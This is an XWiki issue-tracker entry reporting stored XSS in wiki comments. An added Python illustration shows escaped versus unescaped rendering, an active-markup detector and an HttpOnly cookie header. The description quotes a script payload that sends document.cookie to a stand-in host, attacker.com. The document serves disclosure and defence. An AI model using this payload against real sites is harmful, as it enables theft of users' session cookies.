Details
Bug
Resolution: Duplicate
Major
None
1.2.1
None
security
Description
XWiki Comments are vulnerable to XSS.
Writing something like this in a comment field would permit an attacker to steal users' authentication cookies:
<script>
document.write('<IFRAME SRC="http://attacker.com/evil?cookie='document.cookie'"></IFRAME>')
</script>
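Added here as a defender-side illustration, not XWiki's own code: the comment payload quoted above rendered with and without HTML entity encoding, a heuristic check for active markup that survives rendering, and the HttpOnly cookie flag that blunts the cookie-theft half of the attack. The wrapper element class, the check and the header builder are hypothetical names chosen for this example.

```python
import html
import re

# Constructed copy of the comment body quoted in the issue description.
PAYLOAD = (
    "<script>\n"
    "document.write('<IFRAME SRC=\"http://attacker.com/evil?cookie='document.cookie'\"></IFRAME>')\n"
    "</script>"
)

# Heuristic for tags and inline event handlers a browser would execute.
ACTIVE_TAG = re.compile(r"<\s*(script|iframe|object|embed|img|svg)\b|\bon\w+\s*=", re.IGNORECASE)

WRAPPER_OPEN = '<div class="xwikicomment">'   # hypothetical wrapper, not XWiki's real markup
WRAPPER_CLOSE = "</div>"


def render_comment_vulnerable(text: str) -> str:
    """Interpolates the raw comment body into the page: the browser parses it as markup."""
    return f"{WRAPPER_OPEN}{text}{WRAPPER_CLOSE}"


def render_comment_escaped(text: str) -> str:
    """Entity-encodes the body so the browser shows it as text, not markup.
    quote=True also encodes double and single quotes, which matters in attribute contexts."""
    return f"{WRAPPER_OPEN}{html.escape(text, quote=True)}{WRAPPER_CLOSE}"


def has_active_markup(rendered: str) -> bool:
    """Detection helper (hypothetical): True if script-capable tags or on*= handlers
    survive inside the wrapper after rendering."""
    body = rendered[len(WRAPPER_OPEN):-len(WRAPPER_CLOSE)]
    return ACTIVE_TAG.search(body) is not None


def session_cookie_header(name: str, value: str) -> str:
    """Defense in depth: an HttpOnly cookie is invisible to document.cookie, so even
    a surviving XSS cannot read it the way the payload above tries to."""
    return f"Set-Cookie: {name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

Escaping on output is the comment-side fix; the cookie flags limit the blast radius if any other injection point is missed.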
Issue Links
- depends on XWIKI-7878 Add a 'restricted' parameter to transformation context to enable a safe rendering mode (Closed)
- is duplicated by XWIKI-4875 Security issue: Arbitrary HTML code can be used in comments (Closed)